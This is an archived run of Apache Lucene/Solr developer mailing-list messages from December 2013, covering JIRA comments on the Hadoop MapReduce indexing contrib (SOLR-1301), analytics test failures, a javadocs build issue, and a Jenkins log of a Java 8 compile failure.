> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837036#comment-13837036
 ] 

Uwe Schindler commented on SOLR-1301:
-

I found out that some tests don't work on Windows, for the same reason why the 
MiniDFS tests don't work in Solr-Core: Some crazy command line tools are 
missing. I would mark all those tests with the same assume like HdfsDirectory 
tests?

Should I start doing this?

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837032#comment-13837032
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547232 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547232 ]

SOLR-1301: Fix compilation for Java 8 (the Java 8 compiler is more picky, but 
it's not a Java 8 regression: the code was just wrong)

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

RE: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8548 - Still Failing!

2013-12-02 Thread Uwe Schindler

This is wrong code, just not detected by Java 7.

I'll fix.

-
Uwe Schindler
H.-H.-Meier-Allee 63, D-28213 Bremen
http://www.thetaphi.de
eMail: u...@thetaphi.de


> -Original Message-
> From: Policeman Jenkins Server [mailto:jenk...@thetaphi.de]
> Sent: Monday, December 02, 2013 11:17 PM
> To: dev@lucene.apache.org; markrmil...@apache.org
> Subject: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build #
> 8548 - Still Failing!
> 
> Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8548/
> Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
> 
> All tests passed
> 
> Build Log:
> [...truncated 16249 lines...]
> [javac] Compiling 3 source files to /mnt/ssd/jenkins/workspace/Lucene-
> Solr-trunk-Linux/solr/build/contrib/solr-morphlines-cell/classes/java
> [javac] warning: [options] bootstrap class path not set in conjunction 
> with -
> source 1.7
> [javac] /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-
> Linux/solr/contrib/solr-morphlines-
> cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java:127: error:
> incompatible types: Object cannot be converted to String
> [javac]   for (String capture : getConfigs().getStringList(config,
> ExtractingParams.CAPTURE_ELEMENTS, Collections.EMPTY_LIST)) {
> [javac]   ^
> [javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-
> Linux/solr/contrib/solr-morphlines-
> cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses or
> overrides a deprecated API.
> [javac] Note: Recompile with -Xlint:deprecation for details.
> [javac] Note: /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-
> Linux/solr/contrib/solr-morphlines-
> cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java uses
> unchecked or unsafe operations.
> [javac] Note: Recompile with -Xlint:unchecked for details.
> [javac] 1 error
> 
> [...truncated 1 lines...]
> BUILD FAILED
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The
> following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The
> following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The
> following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37:
> The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209:
> The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-
> build.xml:441: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-
> build.xml:491: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-
> build.xml:476: The following error occurred while executing this line:
> /mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-
> build.xml:1732: Compile failed; see the compiler error output for details.
> 
> Total time: 51 minutes 47 seconds
> Build step 'Invoke Ant' marked build as failure Description set: Java:
> 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC Archiving artifacts
> Recording test results Email was triggered for: Failure Sending email for
> trigger: Failure
> 



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837001#comment-13837001
 ] 

Mark Miller commented on SOLR-1301:
---

Removing solr from the module names sounds good to me.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836998#comment-13836998
 ] 

Erick Erickson commented on SOLR-5488:
--

It seems to happen at least once or twice a night on some of the test machines. 
I cannot make it happen at will, or at all on my machine for that matter.

If you subscribe to the dev list, you'll see them pretty much each day, 
particularly in the morning. It may be this happens with some of the @nightly. 
But I can't seem to reproduce this, even with the seeds. See: 
http://lucene.apache.org/solr/discussion.html and the dev@lucene.apache.org

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836988#comment-13836988
 ] 

Uwe Schindler commented on SOLR-1301:
-

Hi,
it seems to resolve correctly now. There is one inconsistency: the folder 
names. The new contribs have all "solr-" in the folder name, which is 
inconsistent to the others. I would prefer to rename the folder names with 
{{svn mv}} and maybe fix some paths in dependencies and maven. The build.xml 
files use the correct name already, so JAR files are named correctly.
Uwe

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8548 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8548/
Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 16249 lines...]
[javac] Compiling 3 source files to 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/contrib/solr-morphlines-cell/classes/java
[javac] warning: [options] bootstrap class path not set in conjunction with 
-source 1.7
[javac] 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java:127:
 error: incompatible types: Object cannot be converted to String
[javac]   for (String capture : getConfigs().getStringList(config, 
ExtractingParams.CAPTURE_ELEMENTS, Collections.EMPTY_LIST)) {
[javac]   ^
[javac] Note: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java
 uses or overrides a deprecated API.
[javac] Note: Recompile with -Xlint:deprecation for details.
[javac] Note: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/src/java/org/apache/solr/morphlines/cell/SolrCellBuilder.java
 uses unchecked or unsafe operations.
[javac] Note: Recompile with -Xlint:unchecked for details.
[javac] 1 error

[...truncated 1 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:441: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:491: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:476: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/lucene/common-build.xml:1732:
 Compile failed; see the compiler error output for details.

Total time: 51 minutes 47 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Houston Putman (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836982#comment-13836982
 ] 

Houston Putman commented on SOLR-5488:
--

I'm all for putting this in 4.x. 

Regarding the test failures with weird nulls in the results, I don't know what 
the issue is... How often does it happen?

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836945#comment-13836945
 ] 

Mark Miller commented on SOLR-1301:
---

One issue that I had to work around will be solved with 
https://issues.apache.org/jira/browse/YARN-1442

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Uwe Schindler (JIRA)


 [ 
https://issues.apache.org/jira/browse/LUCENE-5355?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated LUCENE-5355:
--

Attachment: LUCENE-5355.patch

Patch.

> Add more support to validate the -Dbootclasspath given for javadocs generate
> 
>
> Key: LUCENE-5355
> URL: https://issues.apache.org/jira/browse/LUCENE-5355
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: general/build
>Affects Versions: 4.6
> Environment: MacOSX AppleJDK6
>Reporter: Uwe Schindler
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5355.patch
>
>
> When Simon created the nice looking javadocs for LuSolr 4.6, he just 
> copypasted the command line from 
> http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs
> Unfortunately this does not work with AppleJDK6, because it has no rt.jar! 
> The rt.jar file is there in a completely different directory and is named 
> classes.jar. I had a similar problem when I wanted to regenerate the Javadocs 
